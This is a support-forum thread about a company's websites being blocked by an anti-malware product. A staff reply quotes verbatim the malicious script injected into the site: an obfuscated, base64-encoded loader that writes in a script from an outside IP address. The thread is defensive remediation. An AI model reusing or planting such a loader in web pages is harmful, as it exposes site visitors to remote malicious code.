Jouni Posted April 29, 2021 ID:1454001 Share Posted April 29, 2021 Possible FP for hxxps://www.seclan.com (81.19.112.23) Hello, Our company has a problem related to Malwarebytes. We don’t know why our company websites are blocked in Malwarebytes? Here’s a log-file from my computer’s Malwarebytes scan: Malwarebytes www.malwarebytes.com -Log Details- Scan Date: 4/16/21 Scan Time: 3:10 PM Log File: afe7a99a-9eac-11eb-a9ed-78acc0ae97b2.json -Software Information- Version: 4.1.2.73 Components Version: 1.0.1003 Update Package Version: 1.0.39465 License: Trial -System Information- OS: Windows 10 (Build 19041.928) CPU: x64 File System: NTFS User: JOHENT-Z400\root -Scan Summary- Scan Type: Threat Scan Scan Initiated By: Manual Result: Completed Objects Scanned: 377509 Threats Detected: 0 Threats Quarantined: 0 Time Elapsed: 6 min, 8 sec -Scan Options- Memory: Enabled Startup: Enabled Filesystem: Enabled Archives: Enabled Rootkits: Enabled Heuristics: Enabled PUP: Detect PUM: Detect -Scan Details- Process: 0 (No malicious items detected) Module: 0 (No malicious items detected) Registry Key: 0 (No malicious items detected) Registry Value: 0 (No malicious items detected) Registry Data: 0 (No malicious items detected) Data Stream: 0 (No malicious items detected) Folder: 0 (No malicious items detected) File: 0 (No malicious items detected) Physical Sector: 0 (No malicious items detected) WMI: 0 (No malicious items detected) (end) And here’s the information flag that we get when entering into any of our company websites: Here’s the corresponding log-file: Malwarebytes www.malwarebytes.com -Log Details- Protection Event Date: 4/16/21 Protection Event Time: 4:29 PM Log File: bed98e18-9eb7-11eb-8107-78acc0ae97b2.json -Software Information- Version: 4.1.2.73 Components Version: 1.0.1003 Update Package Version: 1.0.39465 License: Trial -System Information- OS: Windows 10 (Build 19041.928) CPU: x64 File System: NTFS User: System -Blocked Website Details- Malicious Website: 1 , C:\Program Files (x86)\Google\Chrome\Application\chrome.exe, Blocked, -1, -1, 0.0.0, , -Website Data- Category: Trojan Domain: zammad.seclan.com IP Address: 81.19.123.72 Port: 443 Type: Outbound File: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (end) Here are the IP addresses of the sites: ip=109.70.162.92&url=seafile.seclan.com ip=81.19.112.23&url=www.seclan.com ip=81.19.123.72&url=zammad.seclan.com ip=109.70.160.99&url=smtp-auth.seclan.com ip=81.19.112.26&url=kopano.seclan.com It seems that every site, which is part of the seclan.com domain, is blocked. I can’t figure out why? Could you please tell me how I can fix this? Best Regards, Jouni Henttonen Seclan Ltd. Link to post Share on other sites More sharing options...
Staff Solution Dashke Posted April 29, 2021 Staff Solution ID:1454011 Share Posted April 29, 2021 Hello Jouni, It seems that your website has been infected with a malicious script - <!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script><!--/codes_iframe--> Can you check the source code and remove it, please? Link to post Share on other sites More sharing options...
Jouni Posted May 14, 2021 Author ID:1456840 Share Posted May 14, 2021 Hello, Now we have cleaned everything out that seems not belonging to our site. BR Jouni Link to post Share on other sites More sharing options...
Staff Dashke Posted May 16, 2021 Staff ID:1457176 Share Posted May 16, 2021 Thansk Jouni, the block will be removed. Have a wonderful day! Link to post Share on other sites More sharing options...
Jouni Posted May 16, 2021 Author ID:1457191 Share Posted May 16, 2021 Great, thank you. Thanks, same to you. BR Jouni Link to post Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now